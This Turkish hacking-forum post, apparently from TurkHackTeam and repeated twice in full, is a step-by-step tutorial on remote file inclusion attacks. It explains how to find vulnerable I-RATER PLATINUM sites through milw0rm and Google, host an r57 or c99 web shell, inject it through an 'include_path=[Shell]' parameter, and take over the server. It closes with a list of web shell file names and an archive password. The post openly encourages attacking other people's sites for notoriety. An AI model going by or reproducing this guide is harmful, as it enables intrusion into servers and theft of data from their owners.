Anasayfa
File Include Nedir?_ Amacı Nedir?
File ın Türkçe karşılıgı ''Dosya'' Include un Türkçe karşılığı ise ''içine almak* içermek'' tır.Sımdı bu ıkı sozcugu bırlestırgıınızde File Include dosya içine almak eklemek manasına gelmektedır.Pekı terımı anladıysak ne işe yaramaktadır ;
File include bızım ısmınden anladıgımız üzere sistemlere dosya ekleme yada dosya cağırma manasına gelmektedır.Ama burada en onemli olan cagıracagımız dosyanın turu özellikle illegaliate merak saran kışıler için bu dosya turleri cok onemlidir.Ornegın saldırgan birey cagıracagı bir shell dosyasıyla servera erisebilir ve serverin içindeki tüm bilgileri alıp serverdaki sistemleri hackleyebilir.Bu tıp bir saldırı server sahibi için zarar demetir bunun yanında saldırıya yapan kişi içinse muthiş bir nam ve deneyım olacaktır.
File Include server sahıblerı için tam manasıyla bas belası hackerlar için sedünyadakı en kaliteli yöntemlerden biridir...Kısaca sadece site hacklemekle ilgilenenler içinse hackın vazgecılmesı durumundadır....
File Include Nasıl Uygulanır ?
File Include uygulnaamsını anlatmak için once bir takım terımleri tanımanız gerekmektedir ;
R57shell: Su andadunyadaki en kaliteli shelldir.Shell nedir shell kısaca linux kabugudur.İllegaliate merak saranlar içinse internetin ta kendısıdır.
C99shell: R57Shell in birazcık daha eskı ve daha kullanıssız versiyonudur.
TurkHackTeaM.OrG
File include uygulamasının uygulanmasına gecelim...
Şimdi sizlere file includelardan nasıl yararlanacagınız ve file include terımınden bahsedecem....
Simdi arkadaslar guncel vulnerabilities larin(Acıklarin) en cok yayınlandıgı sistemleri size vereyım ilk olarak ..
[Linkleri görebilmek için üye olun veya giriş yapın.] ( web apps)
[Linkleri görebilmek için üye olun veya giriş yapın.]
...
Genel olarak en genıs arşivmilw0rmda bulunmaktadır.Şimdi uygulamalı olarak bir siteye saldıralım ki olayı iyice anlayın.İlk olarak vulnerabilities imizi bulalım...
milw0rm.com webapps I-RATER PLATINUM Remote File Inclusion Vulnerabilities
Sistemimiz bu oLsun ve sız bu dosyaya tıkladıgınızda I-RATER PLATINUM sistemde olan file include vulnerabilty ne ulasabileceksiniz.Ve acılan sayfaya baktıgınızda
[Linkleri görebilmek için üye olun veya giriş yapın.]
seklinde bir seyle karsılacaksınız.Peki bu ne anlama gelmektedir onuda açıklayım...
xxx.com Bizim saldıracagımız site (Yani Kurban Site Veya Server)
Eger site sahıbı kullandıgı scriptin dosyalarını atarken bir dosya içinde attıysa o
[Linkleri görebilmek için üye olun veya giriş yapın.] şeklinde olacaktır
[Linkleri görebilmek için üye olun veya giriş yapın.]
config_settings.tpl.php?include_path=[Shell]-Buda file includemuzu oldugu bölümdür ki bu devamli değısıklık gosterir ben genel olarak yazıyorum bu su şekildede olabilir o siteye göre değişir.
Bunu nasıl yapacagız ılk milw0rm dan buldugumuz dosyanın adı I-RATER PLATINUM Remote File Inclusion Vulnerabilities peki bu ne anlama geliyo I-RATER PLATINUM olan sistemlerde dosya sokma acıgının bulundugu manasına gelir bizde google.com'da I-RATER PLATINUM seklinde aratırsak yada sistemden yapılmıs herhangı bır sıteye ulasıp altındakı copyrigt yazısını google yazarsanız daha cok site bulabilirsiniz...
Simdi gelelim file includeumuzu uygulamaya etkilenen sistemi ve nasıl buldugumuzu öğrendığımıze gore gerıye sadece pratık kalıyor.
shelli herhangi biryere upload ediyoruz linkimiz [Linkleri görebilmek için üye olun veya giriş yapın.] olsun ve işime devam ediyorum simdi google aramasına geri donelim... aradıgımız sitelerde simdi seriden tek tek deneme yapıyoruz taki file include u yedirecegimiz bir site bulana kadar ....
Yedirme seklimiz su sekilde olacak...
[Linkleri görebilmek için üye olun veya giriş yapın.]
Dikkat edilmesi gereken iki husus var shell linkinizi yazarken = sonrası içinn [Linkleri görebilmek için üye olun veya giriş yapın.] başa mutlaka konulmalı ve sona da ''?'' bu konulmalı mutlaka aksi taktırde yaptıgımız uygulmanın manası olmucaktır cunku calısmayacaktır...
Eğer yerse kullandıgınız shell e gore asagıda ki gibi bir resım cıkacaktır.Dosyalar sıralanmıs yanında permlerin oldugu.
Perm = İzin
C99 ==>http://img151.imageshack.us/my.php?image=shellss1.jpg
R57 ==> [Linkleri görebilmek için üye olun veya giriş yapın.]
Yeşil Renkli olanlarda değişiklik yapabilirsiniz
Ve shelli siteye soktuk artık bır nevı server sızın gerisi size kalmış...
Shell Link (C99)
[Linkleri görebilmek için üye olun veya giriş yapın.]
rar şifresi : turkhackteam.org
\\ By NightWolf //
-------------------------------
c99.shell.php
hbtcasus.php
phpRemotevieW.php
PHPShellbyMacker.php
r57shell-1.3.php
r57shell-v1.24.php
c99shellbeta.php
kobra.php
phpshell.php
PHVayv.php
r57shell-v1.0.php
r57.php
cmd.asp
CyperSpy5.asp
klasvayv.asp
CyberEye.asp
EFSo2.asp
Zehir4.asp
[Linkleri görebilmek için üye olun veya giriş yapın.]
File ın Türkçe karşılıgı ''Dosya'' Include un Türkçe karşılığı ise ''içine almak* içermek'' tır.Sımdı bu ıkı sozcugu bırlestırgıınızde File Include dosya içine almak eklemek manasına gelmektedır.Pekı terımı anladıysak ne işe yaramaktadır ;
File include bızım ısmınden anladıgımız üzere sistemlere dosya ekleme yada dosya cağırma manasına gelmektedır.Ama burada en onemli olan cagıracagımız dosyanın turu özellikle illegaliate merak saran kışıler için bu dosya turleri cok onemlidir.Ornegın saldırgan birey cagıracagı bir shell dosyasıyla servera erisebilir ve serverin içindeki tüm bilgileri alıp serverdaki sistemleri hackleyebilir.Bu tıp bir saldırı server sahibi için zarar demetir bunun yanında saldırıya yapan kişi içinse muthiş bir nam ve deneyım olacaktır.
File Include server sahıblerı için tam manasıyla bas belası hackerlar için sedünyadakı en kaliteli yöntemlerden biridir...Kısaca sadece site hacklemekle ilgilenenler içinse hackın vazgecılmesı durumundadır....
File Include Nasıl Uygulanır ?
File Include uygulnaamsını anlatmak için once bir takım terımleri tanımanız gerekmektedir ;
R57shell: Su andadunyadaki en kaliteli shelldir.Shell nedir shell kısaca linux kabugudur.İllegaliate merak saranlar içinse internetin ta kendısıdır.
C99shell: R57Shell in birazcık daha eskı ve daha kullanıssız versiyonudur.
TurkHackTeaM.OrG
File include uygulamasının uygulanmasına gecelim...
Şimdi sizlere file includelardan nasıl yararlanacagınız ve file include terımınden bahsedecem....
Simdi arkadaslar guncel vulnerabilities larin(Acıklarin) en cok yayınlandıgı sistemleri size vereyım ilk olarak ..
[Linkleri görebilmek için üye olun veya giriş yapın.] ( web apps)
[Linkleri görebilmek için üye olun veya giriş yapın.]
...
Genel olarak en genıs arşivmilw0rmda bulunmaktadır.Şimdi uygulamalı olarak bir siteye saldıralım ki olayı iyice anlayın.İlk olarak vulnerabilities imizi bulalım...
milw0rm.com webapps I-RATER PLATINUM Remote File Inclusion Vulnerabilities
Sistemimiz bu oLsun ve sız bu dosyaya tıkladıgınızda I-RATER PLATINUM sistemde olan file include vulnerabilty ne ulasabileceksiniz.Ve acılan sayfaya baktıgınızda
[Linkleri görebilmek için üye olun veya giriş yapın.]
seklinde bir seyle karsılacaksınız.Peki bu ne anlama gelmektedir onuda açıklayım...
xxx.com Bizim saldıracagımız site (Yani Kurban Site Veya Server)
Eger site sahıbı kullandıgı scriptin dosyalarını atarken bir dosya içinde attıysa o
[Linkleri görebilmek için üye olun veya giriş yapın.] şeklinde olacaktır
[Linkleri görebilmek için üye olun veya giriş yapın.]
config_settings.tpl.php?include_path=[Shell]-Buda file includemuzu oldugu bölümdür ki bu devamli değısıklık gosterir ben genel olarak yazıyorum bu su şekildede olabilir o siteye göre değişir.
Bunu nasıl yapacagız ılk milw0rm dan buldugumuz dosyanın adı I-RATER PLATINUM Remote File Inclusion Vulnerabilities peki bu ne anlama geliyo I-RATER PLATINUM olan sistemlerde dosya sokma acıgının bulundugu manasına gelir bizde google.com'da I-RATER PLATINUM seklinde aratırsak yada sistemden yapılmıs herhangı bır sıteye ulasıp altındakı copyrigt yazısını google yazarsanız daha cok site bulabilirsiniz...
Simdi gelelim file includeumuzu uygulamaya etkilenen sistemi ve nasıl buldugumuzu öğrendığımıze gore gerıye sadece pratık kalıyor.
shelli herhangi biryere upload ediyoruz linkimiz [Linkleri görebilmek için üye olun veya giriş yapın.] olsun ve işime devam ediyorum simdi google aramasına geri donelim... aradıgımız sitelerde simdi seriden tek tek deneme yapıyoruz taki file include u yedirecegimiz bir site bulana kadar ....
Yedirme seklimiz su sekilde olacak...
[Linkleri görebilmek için üye olun veya giriş yapın.]
Dikkat edilmesi gereken iki husus var shell linkinizi yazarken = sonrası içinn [Linkleri görebilmek için üye olun veya giriş yapın.] başa mutlaka konulmalı ve sona da ''?'' bu konulmalı mutlaka aksi taktırde yaptıgımız uygulmanın manası olmucaktır cunku calısmayacaktır...
Eğer yerse kullandıgınız shell e gore asagıda ki gibi bir resım cıkacaktır.Dosyalar sıralanmıs yanında permlerin oldugu.
Perm = İzin
C99 ==>http://img151.imageshack.us/my.php?image=shellss1.jpg
R57 ==> [Linkleri görebilmek için üye olun veya giriş yapın.]
Yeşil Renkli olanlarda değişiklik yapabilirsiniz
Ve shelli siteye soktuk artık bır nevı server sızın gerisi size kalmış...
Shell Link (C99)
[Linkleri görebilmek için üye olun veya giriş yapın.]
rar şifresi : turkhackteam.org
\\ By NightWolf //
-------------------------------
c99.shell.php
hbtcasus.php
phpRemotevieW.php
PHPShellbyMacker.php
r57shell-1.3.php
r57shell-v1.24.php
c99shellbeta.php
kobra.php
phpshell.php
PHVayv.php
r57shell-v1.0.php
r57.php
cmd.asp
CyperSpy5.asp
klasvayv.asp
CyberEye.asp
EFSo2.asp
Zehir4.asp
[Linkleri görebilmek için üye olun veya giriş yapın.]
